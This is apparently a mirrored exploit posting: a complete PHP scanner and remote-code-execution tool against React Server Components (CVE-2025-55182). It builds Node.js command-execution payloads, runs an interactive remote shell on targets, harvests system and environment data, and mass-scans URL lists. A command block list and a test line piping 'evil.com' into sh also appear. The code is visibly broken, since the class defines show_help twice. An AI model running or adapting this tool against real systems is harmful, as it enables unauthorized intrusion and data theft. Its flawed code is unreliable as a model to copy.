Share
## https://sploitus.com/exploit?id=PACKETSTORM:212606
=============================================================================================================================================
    | # Title     : React 19.2.0 PHP Scanner & RCE Exploit Tool                                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://react.dev                                                                                                           |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212444/ &	CVE-2025-55182
    
    [+] Summary : This project delivers a PHP-based vulnerability scanner and remote code execution (RCE) exploit for CVEโ€‘2025โ€‘55182 affecting React Server Components.
    
    [+] includes:
    
    Target scanning (single/multiple hosts)
    
    Vulnerability detection
    
    RCE payload execution
    
    Interactive remote shell
    
    Structured JSON parsing with fallback
    
    Multipart form-data payload handling
    
    The exploit leverages RSC serialization weaknesses to execute arbitrary commands and validate successful exploitation.
    
    [+]  POC : 
    
    <?php
    /**
     * by indoushka
     */
    
    class CVE_2025_55182_Scanner_Secure {
        // ANSI Color Codes with Windows fallback
        private $colors = [];
        
        private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
        private $timeout = 10;
        private $verify_ssl = false;
        private $max_cmd_length = 200; // Maximum command length for safety
        
        public function __construct() {
            // Initialize colors based on OS
            $this->init_colors();
            
            // Suppress SSL warnings
            if (function_exists('stream_context_set_default')) {
                stream_context_set_default([
                    'ssl' => [
                        'verify_peer' => false,
                        'verify_peer_name' => false,
                    ]
                ]);
            }
        }
        
        private function init_colors() {
            // Check if we're on Windows CMD without ANSI support
            $is_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
            $has_ansi_support = false;
            
            if ($is_windows && PHP_SAPI === 'cli') {
                // Try to detect ANSI support in Windows 10+
                $has_ansi_support = (function_exists('sapi_windows_vt100_support') && sapi_windows_vt100_support(STDOUT))
                    || getenv('ANSICON') !== false
                    || getenv('ConEmuANSI') === 'ON'
                    || getenv('TERM') === 'xterm';
            } elseif (!$is_windows) {
                $has_ansi_support = true; // Unix-like systems usually support ANSI
            }
            
            if ($has_ansi_support) {
                $this->colors = [
                    'HEADER' => "\033[95m",
                    'BLUE' => "\033[94m",
                    'GREEN' => "\033[92m",
                    'WARNING' => "\033[93m",
                    'FAIL' => "\033[91m",
                    'ENDC' => "\033[0m",
                    'BOLD' => "\033[1m",
                    'CYAN' => "\033[96m",
                    'MAGENTA' => "\033[95m",
                    'BG_RED' => "\033[41m"
                ];
            } else {
                // No colors for unsupported terminals
                $this->colors = array_fill_keys([
                    'HEADER', 'BLUE', 'GREEN', 'WARNING', 'FAIL', 
                    'ENDC', 'BOLD', 'CYAN', 'MAGENTA', 'BG_RED'
                ], '');
            }
        }
        
        private function color($name) {
            return $this->colors[$name] ?? '';
        }
        
        private function print_info($msg) {
            echo $this->color('BLUE') . "[*] " . $msg . $this->color('ENDC') . PHP_EOL;
        }
        
        private function print_success($msg) {
            echo $this->color('GREEN') . "[+] " . $msg . $this->color('ENDC') . PHP_EOL;
        }
        
        private function print_error($msg) {
            echo $this->color('FAIL') . "[-] " . $msg . $this->color('ENDC') . PHP_EOL;
        }
        
        private function print_warning($msg) {
            echo $this->color('WARNING') . "[!] " . $msg . $this->color('ENDC') . PHP_EOL;
        }
        
        private function print_critical($msg) {
            echo $this->color('BG_RED') . $this->color('BOLD') . "[CRITICAL] " . $msg . $this->color('ENDC') . PHP_EOL;
        }
        
        private function validate_command($cmd) {
            // Check command length
            if (strlen($cmd) > $this->max_cmd_length) {
                $this->print_error("Command too long (max {$this->max_cmd_length} characters)");
                return false;
            }
            
            // Block potentially dangerous commands in interactive mode
            $dangerous_patterns = [
                '/\brm\s+-rf\b/i',
                '/\bmkfs\b/i',
                '/\bdd\s+if=/i',
                '/\bchmod\s+777\b/i',
                '/\bwget\b.*\|\s*sh/i',
                '/\bcurl\b.*\|\s*sh/i',
                '/;.*;/', // Multiple command separators
                '/`.*`/', // Backticks
                '/\$\s*\(/', // $() syntax
                '/\|\s*\{/', // Pipe to block
            ];
            
            foreach ($dangerous_patterns as $pattern) {
                if (preg_match($pattern, $cmd)) {
                    $this->print_warning("Potentially dangerous command detected and blocked");
                    return false;
                }
            }
            
            return true;
        }
        
        private function sanitize_command($cmd) {
            // Basic sanitization for different command types
            $cmd = trim($cmd);
            
            // Handle echo commands specially - remove quotes if present
            if (preg_match('/^echo\s+/i', $cmd)) {
                // Extract the part after echo
                $echo_content = substr($cmd, 5);
                $echo_content = trim($echo_content, " \t\n\r\0\x0B\"'");
                
                // Only allow safe characters for echo
                $echo_content = preg_replace('/[^\w\d\s\-_\.]/', '', $echo_content);
                
                return 'echo ' . $echo_content;
            }
            
            // For other commands, allow more characters but still sanitize
            $cmd = preg_replace('/[^\w\d\s\-_\.\/\\\,:;&|><=\[\]{}()@#!~`\$\+\-\*"\'?]/', '', $cmd);
            
            // Limit consecutive special characters
            $cmd = preg_replace('/([;&|])\1+/', '$1', $cmd);
            
            return $cmd;
        }
        
        private function build_payload($cmd) {
            // Multiple payload variations for different environments
            $payloads = [
                // Primary payload - standard Node.js RCE
                [
                    "id" => "vm#runInThisContext",
                    "bound" => ["console.log('RCE_TEST'); process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
                ],
                
                // Alternative payload 1 - Different context
                [
                    "id" => "vm#runInNewContext",
                    "bound" => ["global.process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
                ],
                
                // Alternative payload 2 - Using module constructor
                [
                    "id" => "module#constructor",
                    "bound" => ["new module.constructor('return process')().mainModule.require('child_process').execSync('{$cmd}').toString()"]
                ],
                
                // Alternative payload 3 - Direct require
                [
                    "id" => "global#require",
                    "bound" => ["global.require('child_process').execSync('{$cmd}').toString()"]
                ]
            ];
            
            // Return the primary payload (can be modified to try all)
            return json_encode($payloads[0]);
        }
        
        private function send_payload($url, $cmd, $payload_variant = 0) {
            // Validate command first
            if (!$this->validate_command($cmd)) {
                return [
                    'content' => null,
                    'headers' => [],
                    'status' => 0,
                    'success' => false,
                    'error' => 'Command validation failed'
                ];
            }
            
            // Sanitize command
            $safe_cmd = $this->sanitize_command($cmd);
            
            // Build payload based on variant
            $payload = $this->build_payload($safe_cmd);
            
            // Prepare multipart form data
            $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
            $content = "--{$boundary}\r\n";
            $content .= "Content-Disposition: form-data; name=\"\$ACTION_REF_0\"\r\n\r\n1\r\n";
            $content .= "--{$boundary}\r\n";
            $content .= "Content-Disposition: form-data; name=\"\$ACTION_0:0\"\r\n\r\n";
            $content .= $payload . "\r\n";
            $content .= "--{$boundary}--\r\n";
            
            $headers = [
                "Content-Type: multipart/form-data; boundary={$boundary}",
                "User-Agent: {$this->user_agent}",
                "Accept: */*",
                "Connection: close",
                "X-Requested-With: XMLHttpRequest",
                "Origin: " . parse_url($url, PHP_URL_SCHEME) . "://" . parse_url($url, PHP_URL_HOST)
            ];
            
            $context = stream_context_create([
                'http' => [
                    'method' => 'POST',
                    'header' => implode("\r\n", $headers),
                    'content' => $content,
                    'timeout' => $this->timeout,
                    'ignore_errors' => true
                ],
                'ssl' => [
                    'verify_peer' => $this->verify_ssl,
                    'verify_peer_name' => $this->verify_ssl
                ]
            ]);
            
            try {
                $start_time = microtime(true);
                $response = @file_get_contents($url, false, $context);
                $response_time = round((microtime(true) - $start_time) * 1000, 2);
                
                $http_response_header = $http_response_header ?? [];
                
                return [
                    'content' => $response,
                    'headers' => $http_response_header,
                    'status' => $this->get_http_status($http_response_header),
                    'success' => $response !== false,
                    'response_time' => $response_time,
                    'payload_variant' => $payload_variant,
                    'error' => $response === false ? error_get_last()['message'] ?? 'Unknown error' : null
                ];
            } catch (Exception $e) {
                $this->print_error("Connection error: " . $e->getMessage());
                return [
                    'content' => null,
                    'headers' => [],
                    'status' => 0,
                    'success' => false,
                    'response_time' => 0,
                    'error' => $e->getMessage()
                ];
            }
        }
        
        private function get_http_status($headers) {
            if (empty($headers)) return 0;
            
            $status_line = $headers[0];
            preg_match('/HTTP\/\d\.\d\s+(\d+)/', $status_line, $matches);
            
            return isset($matches[1]) ? (int)$matches[1] : 0;
        }
        
        private function generate_token($length = 16) {
            $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
            $token = '';
            
            for ($i = 0; $i < $length; $i++) {
                $token .= $chars[random_int(0, strlen($chars) - 1)];
            }
            
            return $token;
        }
        
        private function extract_result_from_response($content, $token = null) {
            $result = [
                'type' => 'unknown',
                'result' => null,
                'error' => null,
                'token_found' => false,
                'json_valid' => false,
                'raw_preview' => substr($content, 0, 200) . (strlen($content) > 200 ? '...' : '')
            ];
            
            // Method 1: Try JSON parsing first
            if (!empty($content)) {
                $json_data = @json_decode($content, true);
                
                if (json_last_error() === JSON_ERROR_NONE) {
                    $result['json_valid'] = true;
                    $result['type'] = 'json';
                    $result['full_json'] = $json_data;
                    
                    if (isset($json_data['result'])) {
                        $result['result'] = $json_data['result'];
                    }
                    if (isset($json_data['error'])) {
                        $result['error'] = $json_data['error'];
                    }
                    if (isset($json_data['message'])) {
                        $result['error'] = $json_data['message'];
                    }
                }
            }
            
            // Method 2: Look for token in raw response
            if ($token !== null && !empty($content)) {
                if (strpos($content, $token) !== false) {
                    $result['token_found'] = true;
                    $result['type'] = $result['type'] === 'unknown' ? 'raw' : $result['type'];
                    
                    // Extract context around token
                    $pos = strpos($content, $token);
                    $start = max(0, $pos - 100);
                    $end = min(strlen($content), $pos + 100);
                    $context = substr($content, $start, $end - $start);
                    
                    if (empty($result['result'])) {
                        $result['result'] = $context;
                    }
                }
            }
            
            // Method 3: Try to extract from common patterns
            if (empty($result['result']) && !empty($content)) {
                $patterns = [
                    '/result["\']?\s*:\s*["\']?([^"\',}]+)/i',
                    '/output["\']?\s*:\s*["\']?([^"\',}]+)/i',
                    '/data["\']?\s*:\s*["\']?([^"\',}]+)/i',
                    '/<pre[^>]*>([^<]+)<\/pre>/i',
                    '/<code[^>]*>([^<]+)<\/code>/i'
                ];
                
                foreach ($patterns as $pattern) {
                    if (preg_match($pattern, $content, $matches)) {
                        $result['result'] = trim($matches[1]);
                        $result['type'] = 'pattern';
                        break;
                    }
                }
            }
            
            return $result;
        }
        
        public function scan($url, $detailed = false) {
            $this->print_info("Scanning {$url} for CVE-2025-55182...");
            
            $token = $this->generate_token(16);
            $cmd = "echo " . $token;  // No quotes needed for echo
            
            $response = $this->send_payload($url, $cmd);
            
            if (!$response['success'] || $response['content'] === null) {
                $this->print_error("Failed to connect to target.");
                $this->print_info("Error: " . ($response['error'] ?? 'Unknown'));
                $this->print_info("Response time: {$response['response_time']}ms");
                return false;
            }
            
            $content = $response['content'];
            $analysis = $this->extract_result_from_response($content, $token);
            
            if ($detailed) {
                $this->print_info("=== Detailed Analysis ===");
                $this->print_info("Response type: " . $analysis['type']);
                $this->print_info("HTTP Status: " . $response['status']);
                $this->print_info("Response time: {$response['response_time']}ms");
                $this->print_info("JSON valid: " . ($analysis['json_valid'] ? 'Yes' : 'No'));
                $this->print_info("Token found: " . ($analysis['token_found'] ? 'Yes' : 'No'));
                
                if ($analysis['error']) {
                    $this->print_warning("Server error: " . $analysis['error']);
                }
            }
            
            // Check for vulnerability
            $is_vulnerable = false;
            $confidence = 'low';
            
            // High confidence: Token found in JSON result
            if ($analysis['type'] === 'json' && $analysis['result'] && strpos($analysis['result'], $token) !== false) {
                $is_vulnerable = true;
                $confidence = 'high';
                $this->print_success("HIGH CONFIDENCE: Token found in JSON result");
            }
            // Medium confidence: Token found in raw response
            elseif ($analysis['token_found']) {
                $is_vulnerable = true;
                $confidence = 'medium';
                $this->print_success("MEDIUM CONFIDENCE: Token found in raw response");
            }
            // Low confidence: Response looks like RCE output but no token
            elseif ($analysis['result'] && preg_match('/\b(root|admin|www-data|user)\b/i', $analysis['result'])) {
                $is_vulnerable = true;
                $confidence = 'low';
                $this->print_warning("LOW CONFIDENCE: RCE-like output detected");
            }
            
            if ($is_vulnerable) {
                $this->print_success("Target appears to be VULNERABLE (confidence: {$confidence})!");
                
                if ($analysis['result']) {
                    $output = trim($analysis['result']);
                    $output_preview = strlen($output) > 100 ? substr($output, 0, 100) . '...' : $output;
                    $this->print_info("Output preview: " . $output_preview);
                }
                
                // Try to get more info if detailed scan
                if ($detailed) {
                    $this->print_info("Gathering system information...");
                    $info_cmds = [
                        'whoami' => 'Current user',
                        'uname -a || ver' => 'System info',
                        'pwd' => 'Current directory',
                        'id || whoami /all' => 'User details'
                    ];
                    
                    foreach ($info_cmds as $cmd => $desc) {
                        $resp = $this->send_payload($url, $cmd);
                        if ($resp['success'] && $resp['content']) {
                            $info = $this->extract_result_from_response($resp['content']);
                            if ($info['result']) {
                                $clean_result = trim(preg_replace('/\s+/', ' ', $info['result']));
                                $this->print_info("{$desc}: " . substr($clean_result, 0, 80));
                            }
                        }
                        usleep(50000); // 50ms delay
                    }
                }
                
                return ['vulnerable' => true, 'confidence' => $confidence];
            } else {
                $this->print_warning("Target does not appear to be vulnerable.");
                if ($detailed) {
                    $this->print_info("Response preview: " . $analysis['raw_preview']);
                }
                return ['vulnerable' => false, 'confidence' => 'none'];
            }
        }
        
        public function exploit($url) {
            $this->print_critical("=== EXPLOIT MODE ACTIVATED ===");
            $this->print_warning("You are about to exploit a vulnerable system.");
            $this->print_warning("Make sure you have proper authorization!");
            
            // Initial scan with details
            $scan_result = $this->scan($url, true);
            
            if (!$scan_result['vulnerable']) {
                $this->print_error("Target is not vulnerable or confidence is too low.");
                $this->print_info("Would you like to proceed anyway? (yes/no): ");
                $response = trim(fgets(STDIN));
                
                if (strtolower($response) !== 'yes') {
                    $this->print_info("Exploit cancelled.");
                    return;
                }
                
                $this->print_warning("Proceeding with low-confidence target...");
            }
            
            $this->print_success("Starting interactive shell on {$url}");
            $this->print_info("Type 'help' for available commands, 'exit' to quit.");
            
            // Get initial system info
            $sysinfo = $this->get_system_info($url);
            $user = $sysinfo['user'] ?? 'unknown';
            $hostname = $sysinfo['hostname'] ?? 'unknown';
            $platform = $sysinfo['platform'] ?? 'unknown';
            
            // Interactive shell loop
            $command_history = [];
            while (true) {
                // Build prompt with colors
                $prompt = $this->color('GREEN') . $user . "@" . $hostname . $this->color('ENDC') . 
                         " [" . $this->color('CYAN') . $platform . $this->color('ENDC') . "] " .
                         $this->color('BLUE') . $this->color('BOLD') . "> " . $this->color('ENDC');
                
                echo $prompt;
                
                // Get command input
                if (function_exists('readline')) {
                    readline_completion_function(function($input, $index) {
                        $commands = ['help', 'exit', 'clear', 'sysinfo', 'history', 'pwd', 'ls', 'cd', 'cat', 'whoami', 'id'];
                        return array_filter($commands, function($cmd) use ($input) {
                            return stripos($cmd, $input) === 0;
                        });
                    });
                    
                    $cmd = readline();
                    if ($cmd !== '') {
                        readline_add_history($cmd);
                        $command_history[] = $cmd;
                    }
                } else {
                    $cmd = trim(fgets(STDIN));
                    if (!empty($cmd)) {
                        $command_history[] = $cmd;
                    }
                }
                
                // Handle exit
                if (strtolower($cmd) === 'exit' || strtolower($cmd) === 'quit') {
                    $this->print_info("Exiting interactive shell...");
                    break;
                }
                
                // Handle empty command
                if (empty($cmd)) {
                    continue;
                }
                
                // Handle special commands
                switch (strtolower($cmd)) {
                    case 'help':
                        $this->show_help();
                        continue 2;
                        
                    case 'clear':
                    case 'cls':
                        system(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'cls' : 'clear');
                        continue 2;
                        
                    case 'history':
                        $this->show_history($command_history);
                        continue 2;
                        
                    case 'sysinfo':
                        $this->show_sysinfo($url);
                        continue 2;
                        
                    case 'safe':
                        $this->print_info("Safe mode enabled - blocking dangerous commands");
                        $this->print_info("Current restrictions: rm, mkfs, dd, chmod 777, wget|sh, curl|sh");
                        continue 2;
                }
                
                // Validate command length
                if (strlen($cmd) > $this->max_cmd_length) {
                    $this->print_error("Command too long (max {$this->max_cmd_length} characters)");
                    $this->print_info("Tip: Use redirects or split complex commands");
                    continue;
                }
                
                // Execute command
                $start_time = microtime(true);
                $response = $this->send_payload($url, $cmd);
                $exec_time = round((microtime(true) - $start_time) * 1000, 2);
                
                if ($response['success'] && $response['content']) {
                    $analysis = $this->extract_result_from_response($response['content']);
                    
                    if ($analysis['result']) {
                        echo trim($analysis['result']) . PHP_EOL;
                        $this->print_info("Execution time: {$exec_time}ms | HTTP: {$response['status']}");
                    } elseif ($analysis['error']) {
                        $this->print_error("Server error: " . $analysis['error']);
                    } else {
                        $this->print_warning("Command executed but no output returned.");
                        $this->print_info("Response type: " . $analysis['type']);
                    }
                } else {
                    $this->print_error("Command failed or no response.");
                    $this->print_info("Status: {$response['status']} | Time: {$response['response_time']}ms");
                    if ($response['error']) {
                        $this->print_info("Error: " . $response['error']);
                    }
                }
                
                // Small delay to avoid overwhelming the target
                usleep(100000); // 100ms
            }
            
            $this->print_info("Session ended. Total commands executed: " . count($command_history));
        }
        
        private function get_system_info($url) {
            $info = [
                'user' => 'unknown',
                'hostname' => 'unknown',
                'platform' => 'unknown'
            ];
            
            // Try multiple commands to get info
            $commands = [
                'whoami' => 'user',
                'hostname || hostname' => 'hostname',
                'uname -s -r -m || ver || systeminfo | findstr /B /C:"OS"' => 'platform'
            ];
            
            foreach ($commands as $cmd => $key) {
                $resp = $this->send_payload($url, $cmd);
                if ($resp['success'] && $resp['content']) {
                    $analysis = $this->extract_result_from_response($resp['content']);
                    if ($analysis['result']) {
                        $info[$key] = trim($analysis['result']);
                    }
                }
                usleep(50000); // 50ms delay
            }
            
            return $info;
        }
        
        private function show_help() {
            $help = [
                'Basic Commands:' => [
                    'help' => 'Show this help message',
                    'exit, quit' => 'Exit the interactive shell',
                    'clear, cls' => 'Clear the terminal screen',
                    'history' => 'Show command history',
                    'sysinfo' => 'Display detailed system information',
                    'safe' => 'Show safe mode restrictions'
                ],
                'File Operations:' => [
                    'pwd' => 'Print working directory',
                    'ls, ls -la, dir' => 'List directory contents',
                    'cat <file>' => 'View file contents',
                    'cd <dir>' => 'Change directory (note: may not persist)'
                ],
                'System Info:' => [
                    'whoami' => 'Current user',
                    'id' => 'User ID and groups',
                    'uname -a' => 'System information',
                    'ps aux' => 'Running processes',
                    'netstat -an' => 'Network connections'
                ],
                'Tips:' => [
                    'Command chaining' => 'Use && for sequential commands',
                    'Output redirection' => 'Use > to save output to file',
                    'Pipes' => 'Use | to chain commands',
                    'Background jobs' => 'Use & to run in background'
                ]
            ];
            
            foreach ($help as $section => $commands) {
                $this->print_info("\n{$section}");
                foreach ($commands as $cmd => $desc) {
                    echo "  " . str_pad($cmd, 25) . " - " . $desc . PHP_EOL;
                }
            }
        }
        
        private function show_history($history) {
            if (empty($history)) {
                $this->print_info("No command history yet.");
                return;
            }
            
            $this->print_info("Command History:");
            foreach ($history as $index => $cmd) {
                echo "  [" . ($index + 1) . "] " . $cmd . PHP_EOL;
            }
        }
        
        private function show_sysinfo($url) {
            $this->print_info("Gathering detailed system information...");
            
            $checks = [
                'System' => 'uname -a || ver',
                'Kernel' => 'cat /proc/version 2>/dev/null || systeminfo | findstr /B /C:"OS"',
                'CPU' => 'cat /proc/cpuinfo 2>/dev/null || wmic cpu get name',
                'Memory' => 'free -h 2>/dev/null || wmic memorychip get capacity',
                'Disk' => 'df -h 2>/dev/null || wmic logicaldisk get size,freespace,caption',
                'Network' => 'ifconfig 2>/dev/null || ipconfig /all',
                'Users' => 'who 2>/dev/null || query user',
                'Processes' => 'ps aux | head -20 2>/dev/null || tasklist',
                'Environment' => 'env 2>/dev/null || set',
                'Packages' => 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q'
            ];
            
            foreach ($checks as $name => $cmd) {
                $resp = $this->send_payload($url, $cmd);
                if ($resp['success'] && $resp['content']) {
                    $analysis = $this->extract_result_from_response($resp['content']);
                    if ($analysis['result']) {
                        $output = trim($analysis['result']);
                        $preview = substr($output, 0, 100);
                        $this->print_info("{$name}: " . $preview . (strlen($output) > 100 ? '...' : ''));
                    }
                }
                usleep(100000); // 100ms delay
            }
        }
        
        public function batch_scan($file_path, $output_report = true) {
            if (!file_exists($file_path)) {
                $this->print_error("File not found: {$file_path}");
                return;
            }
            
            $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            
            if (!$urls) {
                $this->print_error("No URLs found in file.");
                return;
            }
            
            $this->print_info("Loaded " . count($urls) . " URLs from {$file_path}");
            $this->print_warning("Batch scan starting. This may take a while...");
            
            $results = [
                'high_confidence' => [],
                'medium_confidence' => [],
                'low_confidence' => [],
                'not_vulnerable' => [],
                'errors' => []
            ];
            
            $start_time = time();
            
            foreach ($urls as $index => $url) {
                $url = trim($url);
                if (empty($url)) continue;
                
                $current = $index + 1;
                $total = count($urls);
                $percent = round(($current / $total) * 100, 1);
                $elapsed = time() - $start_time;
                $eta = $total > 0 ? round(($elapsed / $current) * ($total - $current)) : 0;
                
                $this->print_info("Scanning [{$current}/{$total}] ({$percent}%) ETA: {$eta}s - {$url}");
                
                try {
                    $result = $this->scan($url, false);
                    
                    if ($result['vulnerable']) {
                        switch ($result['confidence']) {
                            case 'high':
                                $results['high_confidence'][] = $url;
                                break;
                            case 'medium':
                                $results['medium_confidence'][] = $url;
                                break;
                            case 'low':
                                $results['low_confidence'][] = $url;
                                break;
                        }
                    } else {
                        $results['not_vulnerable'][] = $url;
                    }
                } catch (Exception $e) {
                    $results['errors'][] = $url . " - " . $e->getMessage();
                }
                
                // Progress delay
                usleep(300000); // 300ms
            }
            
            // Generate report
            $this->print_info("\n" . str_repeat("=", 60));
            $this->print_info("BATCH SCAN COMPLETE");
            $this->print_info("Total time: " . (time() - $start_time) . " seconds");
            $this->print_info(str_repeat("-", 60));
            
            $categories = [
                'high_confidence' => ['High Confidence Vulnerable', $this->color('GREEN')],
                'medium_confidence' => ['Medium Confidence Vulnerable', $this->color('WARNING')],
                'low_confidence' => ['Low Confidence Vulnerable', $this->color('CYAN')],
                'not_vulnerable' => ['Not Vulnerable', $this->color('FAIL')],
                'errors' => ['Errors', $this->color('FAIL')]
            ];
            
            foreach ($categories as $key => [$label, $color]) {
                $count = count($results[$key]);
                echo $color . "[*] " . str_pad($label, 30) . ": " . $count . $this->color('ENDC') . PHP_EOL;
            }
            
            // Save report if requested
            if ($output_report) {
                $report_file = 'cve_scan_report_' . date('Y-m-d_H-i-s') . '.txt';
                $report_content = "CVE-2025-55182 Scan Report\n";
                $report_content .= "Generated: " . date('Y-m-d H:i:s') . "\n";
                $report_content .= "Total URLs: " . count($urls) . "\n\n";
                
                foreach ($categories as $key => [$label, $color]) {
                    $report_content .= "\n=== {$label} ===\n";
                    foreach ($results[$key] as $item) {
                        $report_content .= $item . "\n";
                    }
                }
                
                file_put_contents($report_file, $report_content);
                $this->print_success("Detailed report saved to: {$report_file}");
            }
            
            return $results;
        }
        
        private function print_banner() {
            $banner = $this->color('HEADER') . $this->color('BOLD') . "
        โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
        โ•‘   CVE-2025-55182 Scanner & Exploit Tool                  โ•‘
        โ•‘   React Server Components RCE Vulnerability              โ•‘
        โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•" . $this->color('ENDC') . "
        
        " . $this->color('CYAN') . "[*] Features:" . $this->color('ENDC') . "
        โ€ข Multi-payload support for different environments
        โ€ข Command validation and sanitization
        โ€ข Confidence-based vulnerability detection
        โ€ข Interactive shell with command history
        โ€ข Batch scanning with detailed reporting
        โ€ข Safe mode to prevent dangerous commands
        
        " . $this->color('WARNING') . "[!] SECURITY WARNING:" . $this->color('ENDC') . "
        โ€ข This tool is for AUTHORIZED security testing ONLY
        โ€ข Unauthorized use is ILLEGAL and UNETHICAL
        โ€ข Use only on systems you OWN or have PERMISSION to test
        
        " . $this->color('FAIL') . $this->color('BOLD') . "[!] LEGAL NOTICE: You are responsible for your actions!" . $this->color('ENDC') . "
        ";
            
            echo $banner . PHP_EOL;
        }
        
        public function run() {
            $this->print_banner();
            
            if (PHP_SAPI !== 'cli') {
                $this->print_error("This tool must be run from command line.");
                echo "For web interface, use the separate web version." . PHP_EOL;
                exit(1);
            }
            
            global $argv;
            
            if (count($argv) < 2) {
                $this->show_help();
                exit(1);
            }
            
            $mode = $argv[1];
            
            switch ($mode) {
                case 'scan':
                    if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) {
                        $this->scan($argv[3], true);
                    } elseif (isset($argv[2]) && $argv[2] === '-f' && isset($argv[3])) {
                        $this->batch_scan($argv[3]);
                    } else {
                        $this->show_help();
                    }
                    break;
                    
                case 'exploit':
                    if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) {
                        $this->exploit($argv[3]);
                    } else {
                        $this->show_help();
                    }
                    break;
                    
                case 'test':
                    $this->test_mode();
                    break;
                    
                case 'help':
                case '--help':
                case '-h':
                    $this->show_help();
                    break;
                    
                default:
                    $this->print_error("Unknown mode: {$mode}");
                    $this->show_help();
                    exit(1);
            }
        }
        
        private function test_mode() {
            $this->print_info("Running comprehensive self-test...");
            
            // Test token generation
            $token = $this->generate_token(10);
            $this->print_success("Token generation: OK ({$token})");
            
            // Test command validation
            $test_cmds = [
                'echo test' => true,
                'whoami' => true,
                'ls -la' => true,
                str_repeat('a', 201) => false, // Too long
                'rm -rf /' => false, // Dangerous
                'wget http://evil.com | sh' => false // Dangerous pattern
            ];
            
            foreach ($test_cmds as $cmd => $expected) {
                $result = $this->validate_command($cmd);
                $status = $result === $expected ? 'OK' : 'FAIL';
                $color = $result === $expected ? 'GREEN' : 'FAIL';
                echo $this->color($color) . "[TEST] Command validation '{$cmd}': {$status}" . $this->color('ENDC') . PHP_EOL;
            }
            
            // Test payload building
            $payload = $this->build_payload('test');
            $json_test = json_decode($payload, true);
            $this->print_success("Payload building: " . (json_last_error() === JSON_ERROR_NONE ? 'OK' : 'FAIL'));
            
            // Test required functions
            $required = ['json_encode', 'file_get_contents', 'random_bytes', 'preg_match'];
            $all_ok = true;
            
            foreach ($required as $func) {
                if (!function_exists($func)) {
                    $this->print_error("Missing function: {$func}");
                    $all_ok = false;
                }
            }
            
            if ($all_ok) {
                $this->print_success("All required functions available");
            }
            
            $this->print_info("Self-test completed.");
        }
        
        private function show_help() {
            echo $this->color('BOLD') . "CVE-2025-55182 Enhanced Scanner & Exploit Tool" . $this->color('ENDC') . PHP_EOL;
            echo $this->color('CYAN') . "Version: 2.0 | Enhanced Security Edition" . $this->color('ENDC') . PHP_EOL . PHP_EOL;
            
            echo "Usage:" . PHP_EOL;
            echo "  php " . basename(__FILE__) . " [mode] [options]" . PHP_EOL . PHP_EOL;
            
            echo "Modes:" . PHP_EOL;
            echo "  scan     - Check target vulnerability (detailed analysis)" . PHP_EOL;
            echo "  exploit  - Interactive exploit shell (requires vulnerable target)" . PHP_EOL;
            echo "  test     - Run self-test to verify functionality" . PHP_EOL;
            echo "  help     - Show this help message" . PHP_EOL . PHP_EOL;
            
            echo "Scan Options:" . PHP_EOL;
            echo "  -u URL   - Single target URL (detailed scan)" . PHP_EOL;
            echo "  -f FILE  - File containing list of URLs (batch scan)" . PHP_EOL . PHP_EOL;
            
            echo "Exploit Options:" . PHP_EOL;
            echo "  -u URL   - Target URL to exploit (interactive shell)" . PHP_EOL . PHP_EOL;
            
            echo "Security Features:" . PHP_EOL;
            echo "  โ€ข Command length limitation (max 200 chars)" . PHP_EOL;
            echo "  โ€ข Dangerous command blocking" . PHP_EOL;
            echo "  โ€ข Confidence-based vulnerability detection" . PHP_EOL;
            echo "  โ€ข Safe mode for interactive shell" . PHP_EOL . PHP_EOL;
            
            echo "Examples:" . PHP_EOL;
            echo "  php " . basename(__FILE__) . " scan -u https://target.com/api" . PHP_EOL;
            echo "  php " . basename(__FILE__) . " scan -f targets.txt" . PHP_EOL;
            echo "  php " . basename(__FILE__) . " exploit -u https://target.com/api" . PHP_EOL;
            echo "  php " . basename(__FILE__) . " test" . PHP_EOL;
            
            echo $this->color('WARNING') . PHP_EOL . "[!] Legal Notice: For authorized testing only!" . $this->color('ENDC') . PHP_EOL;
            echo $this->color('FAIL') . "[!] By using this tool, you accept full responsibility for your actions." . $this->color('ENDC') . PHP_EOL;
        }
    }
    
    // Main execution
    if (PHP_SAPI === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
        $scanner = new CVE_2025_55182_Scanner_Secure();
        $scanner->run();
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================